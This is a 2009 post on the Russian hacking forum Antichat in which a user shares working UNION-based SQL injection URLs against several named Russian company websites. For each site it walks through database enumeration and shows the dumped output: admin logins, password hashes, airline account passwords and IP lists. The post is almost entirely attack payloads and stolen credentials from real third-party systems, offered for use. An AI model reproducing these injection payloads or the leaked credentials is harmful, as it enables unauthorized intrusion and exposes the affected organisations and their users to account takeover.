ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.01.2009, 04:31
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Бажные сайты от iTex:
Цитата:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5/*
5.0.41-log:regiontools:regiontools@cub.mplik.ru
наугад подобрал таблицу админа:
Цитата:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,login,password), 2,3,4,5+from+rt_admin/*
admin:5583413443164b56500def9a533c7c70:159753
админка http://www.regiontools.ru/admin.php





Цитата:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+version()/*&id=-100009+union+select+user()/*
5.0.41-log
avantage1@cub.mplik.ru

узнаём название таблицы админа:
Цитата:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
avg_admin
достаём логин и пасс админа:
Цитата:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+concat_ws(0x3a,login,password) +from+avg_admin/*
admin:6a4a680519c8eb06
админка http://www.avantage1.ru/cgi/admin.php
Так же на сайте присутствует форум phpbb,но походу права обрезаны т.к. при запросе на phpbb_users выдаёт ошибку.





Цитата:
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,user(),database ())/*
nevgroup@cub.mplik.ru:nevgroup
Цитата:
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
uralmpg_admin
Цитата:
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,name,password)+ from+uralmpg_admin/*
admin : 5d2e19393cc5ef67 : password
админка http://www.nevgroup.ru/admin.php





Цитата:
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4/*
ogn66@cub.mplik.ru : ogn66 : 5.0.41-log
Цитата:
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,table_name,4+from+informatio n_schema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
fire_admin
fire_cat
fire_cat_group
fire_cat_item
fire_contacts
fire_contactshort
fire_files
fire_hackers
fire_main
fire_meta

Цитата:
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,login,passwor d),4+from+fire_admin/*
ogn:3d8b2df05dd09579b699a9de68c0d4c0
админка http://www.ogn66.ru/admin.php
Ещё заинтересовала очень таблица fire_hackers
Цитата:
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,column_name,4+from+informati on_schema.columns+where+table_name=0x666972655F686 1636B657273/*
т.к. кавычка экранируется то fire_hackers в hex
id
ip
faultscount
blockedtill

Цитата:
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,id,ip,faultsc ount,blockedtill),4+from+fire_hackers/*
1:172.22.1.40:5:2006-11-22 16:15:22
2:194.226.147.230:4:2006-11-22 16:15:22
3:212.23.76.23:4:2006-11-22 16:15:22
4:194.226.152.113:4:2006-11-22 16:15:22
6:62.33.99.50:1
7:87.224.234.89:1
8:195.189.109.34:1

хммм...





Цитата:
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,user(),vers ion(),database()),4/*&rand=474
koltsovo@localhost:5.0.27:koltsovo
Цитата:
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,table_name,4+from+informat ion_schema.tables+limit+16,1/*&rand=474
kol_admin
Цитата:
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,name,passwo rd),4+from+kol_admin/*&rand=474
admin:*CF7FD12395BFB4CEF6EB0B7D4470B621D3F46BE9
vava:*424193A86C662F47463BC77A44B09CB77DDF5870
law:*831CEF9DA73F4BD8E83873E244FF0806EFA90497
orb:*B0F917485699B8B8453A9D41BD2731E69D9D0026
snow:*619C257D7D5EF71F843A7F8F593C1D33C0F1E9EE
forum:*3E64FE741BF14A31A4ED2B58A75A93EB16D809ED
cargo:*B77FC59BEB345D39A5E263E140E50AEB03F05873:
cargaison
Так же заинтересовала очень табличка ua_paroles
Цитата:
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,column_name,4+from+informa tion_schema.columns+where+table_name=0x75615F70617 26F6C6573/*&rand=474#
id
name
class
content

Цитата:
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,id,name,cla ss,content),4+from+ua_paroles+limit+0,1/*&rand=474#
и через limit выводим:
1:vava: password:vo44
3:vava:admin:1
41:uralairline3: password:Sa13na
10:vava:ip:*.*.*.*
12:vava:ip:62.117.33.118
8:vava:ip:62.177.33.118
38:uralairline2: password:lO0ka2
13:skip: password:antiskip
14:skip:ip:*.*.*.*
20:zephyr: password:gene5ys
19:vava:ak:у6,u6,svr,сжр
21:zephyr:ip:*.*.*.*
22:zephyr:ak:ют,p2,piv,
39:uralairline2:ip:*.*.*.*
26:zephyr:admin:1
27:utair: password:uta1R
28:utair:ip:*.*.*.*
29:utair:ak:ют,p2,piv
40:uralairline2:ak:у6,u6,svr,сжр
30:skip:ak:у6,u6,svr,сжр
32:uralairlines: password:urAlA1rl1ne5
33:uralairlines:ip:*.*.*.*
34:uralairlines:ak:у6,u6,svr,сжр
42:uralairline3:ip:*.*.*.*
43:uralairline3:ak:у6,u6,svr,сжр
44:uralairline4: password:hO04
45:uralairline4:ip:*.*.*.*
46:uralairline4:ak:у6,u6,svr,сжр
47:uralairline5: password:xAv13r
48:uralairline5:ip:*.*.*.*
49:uralairline5:ak:у6,u6,svr,сжр
50:zozo:admin:1
51:zozo: password:z0z0
52:zozo:ip:*.*.*.*
53:zozo:ak:*

Так и не врубился от чего всё это =\

Последний раз редактировалось ILYAtirtir; 13.01.2009 в 05:09..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ